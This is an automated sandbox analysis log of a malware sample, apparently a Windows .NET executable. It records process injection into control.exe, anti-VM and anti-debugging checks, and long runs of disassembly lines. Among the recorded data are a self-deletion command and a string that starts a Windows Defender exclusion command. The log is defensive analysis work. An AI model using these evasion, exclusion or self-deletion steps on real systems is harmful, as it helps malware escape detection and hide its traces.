          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: 350969bc_by_Libranalysis.exeReversingLabs: Detection: 36%
          Source: 350969bc_by_Libranalysis.exeString found in binary or memory: &Report-HelpToolStripMenuItem1
          Source: unknownProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe'
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exeJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exeJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess created: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe C:\Users\user\Desktop\350969bc_by_Libranalysis.exeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe'Jump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: 350969bc_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 350969bc_by_Libranalysis.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: 350969bc_by_Libranalysis.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000002.927845340.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716595208.000000000150F000.00000040.00000001.sdmp, control.exe, 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716167439.000000000114A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: 350969bc_by_Libranalysis.exe, control.exe
          Source: Binary string: control.pdbUGP source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716167439.000000000114A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000002.927845340.0000000005A00000.00000002.00000001.sdmp
          Source: 350969bc_by_Libranalysis.exeStatic PE information: 0x909C21C3 [Sun Nov 18 10:56:03 2046 UTC]
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00410109 push ss; iretd 5_2_0041010D
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_004062F9 push ebx; ret 5_2_004062FA
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041B3B5 push eax; ret 5_2_0041B408
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041B46C push eax; ret 5_2_0041B472
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041B402 push eax; ret 5_2_0041B408
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0041B40B push eax; ret 5_2_0041B472
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00406D23 push esi; ret 5_2_00406D2C
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0146D0D1 push ecx; ret 5_2_0146D0E4
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_0478D0D1 push ecx; ret 10_2_0478D0E4
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027A62F9 push ebx; ret 10_2_027A62FA
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027BB3B5 push eax; ret 10_2_027BB408
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027B0109 push ss; iretd 10_2_027B010D
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027BB46C push eax; ret 10_2_027BB472
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027BB40B push eax; ret 10_2_027BB472
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027BB402 push eax; ret 10_2_027BB408
          Source: C:\Windows\SysWOW64\control.exeCode function: 10_2_027A6D23 push esi; ret 10_2_027A6D2C
          Source: initial sampleStatic PE information: section name: .text entropy: 7.87688083082
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 350969bc_by_Libranalysis.exe PID: 6988, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000027A85E4 second address: 00000000027A85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 00000000027A897E second address: 00000000027A8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_004088B0 rdtsc 5_2_004088B0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe TID: 6992Thread sleep time: -100804s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe TID: 7016Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2928Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 1744Thread sleep time: -48000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeThread delayed: delay time: 100804Jump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000006.00000000.678102715.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000006.00000000.683720257.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000006.00000000.678766847.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.689009704.000000000FD01000.00000004.00000001.sdmpBinary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&v
          Source: explorer.exe, 00000006.00000000.683720257.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.683873602.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.675670351.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000006.00000000.678102715.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000006.00000000.683873602.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000006.00000000.678102715.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000006.00000000.683937578.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662948300.0000000003486000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000006.00000000.678102715.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_004088B0 rdtsc 5_2_004088B0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_00409B20 LdrLoadDll,5_2_00409B20
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01453D43 mov eax, dword ptr fs:[00000030h]5_2_01453D43
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143B944 mov eax, dword ptr fs:[00000030h]5_2_0143B944
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143B944 mov eax, dword ptr fs:[00000030h]5_2_0143B944
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01493540 mov eax, dword ptr fs:[00000030h]5_2_01493540
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01437D50 mov eax, dword ptr fs:[00000030h]5_2_01437D50
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141C962 mov eax, dword ptr fs:[00000030h]5_2_0141C962
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141B171 mov eax, dword ptr fs:[00000030h]5_2_0141B171
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141B171 mov eax, dword ptr fs:[00000030h]5_2_0141B171
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143C577 mov eax, dword ptr fs:[00000030h]5_2_0143C577
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143C577 mov eax, dword ptr fs:[00000030h]5_2_0143C577
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01419100 mov eax, dword ptr fs:[00000030h]5_2_01419100
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01419100 mov eax, dword ptr fs:[00000030h]5_2_01419100
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01419100 mov eax, dword ptr fs:[00000030h]5_2_01419100
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01434120 mov eax, dword ptr fs:[00000030h]5_2_01434120
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01434120 mov eax, dword ptr fs:[00000030h]5_2_01434120
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01434120 mov eax, dword ptr fs:[00000030h]5_2_01434120
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01434120 mov eax, dword ptr fs:[00000030h]5_2_01434120
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01434120 mov ecx, dword ptr fs:[00000030h]5_2_01434120
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141AD30 mov eax, dword ptr fs:[00000030h]5_2_0141AD30
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01423D34 mov eax, dword ptr fs:[00000030h]5_2_01423D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E8D34 mov eax, dword ptr fs:[00000030h]5_2_014E8D34
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144513A mov eax, dword ptr fs:[00000030h]5_2_0144513A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144513A mov eax, dword ptr fs:[00000030h]5_2_0144513A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0149A537 mov eax, dword ptr fs:[00000030h]5_2_0149A537
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01444D3B mov eax, dword ptr fs:[00000030h]5_2_01444D3B
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01444D3B mov eax, dword ptr fs:[00000030h]5_2_01444D3B
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01444D3B mov eax, dword ptr fs:[00000030h]5_2_01444D3B
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496DC9 mov eax, dword ptr fs:[00000030h]5_2_01496DC9
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496DC9 mov eax, dword ptr fs:[00000030h]5_2_01496DC9
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496DC9 mov eax, dword ptr fs:[00000030h]5_2_01496DC9
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496DC9 mov ecx, dword ptr fs:[00000030h]5_2_01496DC9
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496DC9 mov eax, dword ptr fs:[00000030h]5_2_01496DC9
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01496DC9 mov eax, dword ptr fs:[00000030h]5_2_01496DC9
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141B1E1 mov eax, dword ptr fs:[00000030h]5_2_0141B1E1
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141B1E1 mov eax, dword ptr fs:[00000030h]5_2_0141B1E1
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0141B1E1 mov eax, dword ptr fs:[00000030h]5_2_0141B1E1
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014A41E8 mov eax, dword ptr fs:[00000030h]5_2_014A41E8
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142D5E0 mov eax, dword ptr fs:[00000030h]5_2_0142D5E0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0142D5E0 mov eax, dword ptr fs:[00000030h]5_2_0142D5E0
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014C8DF1 mov eax, dword ptr fs:[00000030h]5_2_014C8DF1
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144A185 mov eax, dword ptr fs:[00000030h]5_2_0144A185
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0143C182 mov eax, dword ptr fs:[00000030h]5_2_0143C182
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442581 mov eax, dword ptr fs:[00000030h]5_2_01442581
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442581 mov eax, dword ptr fs:[00000030h]5_2_01442581
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442581 mov eax, dword ptr fs:[00000030h]5_2_01442581
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442581 mov eax, dword ptr fs:[00000030h]5_2_01442581
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01412D8A mov eax, dword ptr fs:[00000030h]5_2_01412D8A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01412D8A mov eax, dword ptr fs:[00000030h]5_2_01412D8A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01412D8A mov eax, dword ptr fs:[00000030h]5_2_01412D8A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01412D8A mov eax, dword ptr fs:[00000030h]5_2_01412D8A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01412D8A mov eax, dword ptr fs:[00000030h]5_2_01412D8A
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_01442990 mov eax, dword ptr fs:[00000030h]5_2_01442990
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144FD9B mov eax, dword ptr fs:[00000030h]5_2_0144FD9B
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_0144FD9B mov eax, dword ptr fs:[00000030h]5_2_0144FD9B
          Source: C:\Users\user\Desktop\350969bc_by_Libranalysis.exeCode function: 5_2_014E05AC mov eax, dword ptr fs:[00000030h]5_2_014E05AC
